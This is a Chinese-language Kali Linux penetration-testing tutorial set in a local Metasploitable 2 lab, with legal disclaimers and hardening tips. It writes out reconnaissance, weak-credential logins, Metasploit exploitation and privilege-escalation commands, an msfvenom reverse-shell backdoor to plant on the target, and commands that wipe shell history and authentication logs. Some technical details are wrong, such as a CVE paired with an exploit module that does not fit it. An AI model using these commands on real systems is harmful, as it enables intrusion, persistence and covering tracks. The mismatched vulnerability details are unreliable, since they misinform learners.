Kali Linux渗透测试完整实操指南:从环境搭建到合法攻防

一、前言:渗透测试的核心原则与法律红线

渗透测试(Penetration Testing)是授权范围内对网络系统、应用程序进行安全性评估的合法行为,核心目标是发现潜在漏洞并协助修复,而非恶意攻击。使用 Kali Linux 进行渗透操作前,必须明确:

  1. 仅对自有资产已签署授权协议的目标进行测试;
  2. 严格遵守《网络安全法》《刑法》等法律法规,禁止未授权入侵;
  3. 测试过程全程留痕,结果仅用于安全加固,不得泄露敏感信息。

本文所有操作均基于本地测试环境(VMware 虚拟机搭建靶机),严禁用于任何非法用途。

二、Kali Linux 环境准备与核心工具集

1. 环境搭建
  • 安装方式:推荐 VMware Workstation Pro 搭建 Kali 虚拟机(官网下载官方镜像,默认账户 kali/kali);
  • 靶机选择:使用 Metasploitable 2(漏洞集成靶机,适合新手练习),确保 Kali 与靶机处于同一局域网(桥接模式)。
2. 核心渗透工具分类(附常用工具)

工具类别

核心工具

用途说明

信息收集

Nmap、Whois、Dirb

端口扫描、域名信息查询、目录爆破

漏洞扫描

OpenVAS、Nessus(需授权)

自动化漏洞检测与风险评级

漏洞利用

Metasploit Framework(MSF)

漏洞利用模块调用、 payload 生成

密码攻击

Hydra、John the Ripper

暴力破解、密码哈希破解

权限提升

LinEnum、Windows-Exploit-Suggester

系统提权漏洞探测与利用

后渗透维持

Meterpreter、Empire

会话维持、权限持久化

三、渗透测试实操流程(以 Metasploitable 2 为靶机)

第一步:信息收集(被动 + 主动)
  1. 靶机 IP 探测

执行 nmap -sn 192.168.1.0/24(扫描局域网存活主机),获取靶机 IP(如 192.168.1.105)。

  1. 端口与服务扫描

执行 nmap -sV -p- 192.168.1.105(全端口扫描,显示服务版本),发现开放端口(如 21 FTP、22 SSH、80 HTTP、3306 MySQL)。

  1. 网站目录爆破

执行 dirb http://192.168.1.105,探测网站隐藏目录(如 /phpmyadmin、/dvwa)。

第二步:漏洞扫描与验证
  1. 使用 OpenVAS 扫描漏洞
    • 启动服务:systemctl start openvas,访问 https://127.0.0.1:9392,添加靶机 IP 进行扫描;
    • 扫描结果:发现靶机存在 FTP 匿名登录漏洞、MySQL 弱口令、DVWA 应用漏洞等。
  1. 手动验证漏洞
    • FTP 匿名登录:ftp 192.168.1.105,用户名输入 anonymous,密码留空,成功登录后查看敏感文件。
    • MySQL 弱口令测试:mysql -h 192.168.1.105 -u root -p,尝试密码 root(默认弱口令),成功登录。
第三步:漏洞利用(以 MSF 为例)
  1. 启动 Metasploit:执行 msfconsole,进入交互界面。
  2. 搜索漏洞利用模块

针对靶机 Samba 服务漏洞(如 CVE-2007-2447),执行 search samba 3.0.20,找到模块 exploit/unix/samba/trans2open

  1. 配置并执行利用

use exploit/unix/samba/trans2open  # 加载模块

set RHOSTS 192.168.1.105          # 设置靶机IP

set RPORT 139                     # 设置目标端口

exploit                           # 执行利用

  1. 获取 shell:成功利用后,获得靶机的 Linux 交互式 shell,执行 whoami 查看当前权限(默认 nobody 低权限)。
第四步:权限提升
  1. 查看系统内核版本:执行 uname -a,发现靶机内核为 Linux 2.6.24(存在脏牛漏洞 CVE-2016-5195)。
  2. 搜索提权模块:在 MSF 中执行 search dirty cow,加载模块 exploit/linux/local/dirty_cow
  3. 执行提权

use exploit/linux/local/dirty_cow

set SESSION 1  # 关联已获取的shell会话ID

exploit

  1. 获得 root 权限:提权成功后,执行 whoami 显示为 root,可对靶机进行全面操作(如查看 /etc/shadow 文件)。
第五步:后渗透与痕迹清理
  1. 会话维持:生成后门程序,执行 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.103 LPORT=4444 -f elf -o backdoor.elf,将后门上传至靶机并运行,通过 handler 模块维持连接。
  2. 痕迹清理
    • 删除命令历史:rm -rf ~/.bash_history
    • 清除日志文件:cat /dev/null > /var/log/auth.log
    • 删除后门文件(测试完成后)。

四、安全防护建议(针对渗透测试发现的漏洞)

  1. 系统层面:及时更新内核与补丁,关闭不必要的端口(如 139、445),禁用匿名登录服务;
  2. 账户安全:设置强密码(长度≥12 位,包含字母、数字、特殊字符),定期更换密码,限制 root 远程登录;
  3. 应用层面:升级 Web 应用版本(如 DVWA、phpmyadmin),修复已知漏洞,启用 WAF(Web 应用防火墙);
  4. 监控审计:开启系统日志审计,定期查看登录日志、操作日志,及时发现异常行为。

五、总结与免责声明

Kali Linux 是渗透测试的强大工具,但工具本身无善恶,关键在于使用者的意图。合法的渗透测试是网络安全的重要组成部分,能够帮助企业提前发现并修复漏洞;而未授权的入侵行为,将面临严厉的法律制裁。

本文仅用于技术交流与学习,请勿用于任何非法活动。如因违反相关法律法规造成的一切后果,由使用者自行承担。

(注:文档部分内容可能由 AI 生成)

Logo

北京人形旗下天工造物具身智能开源社区,聚焦具身天工与慧思开物两大平台

更多推荐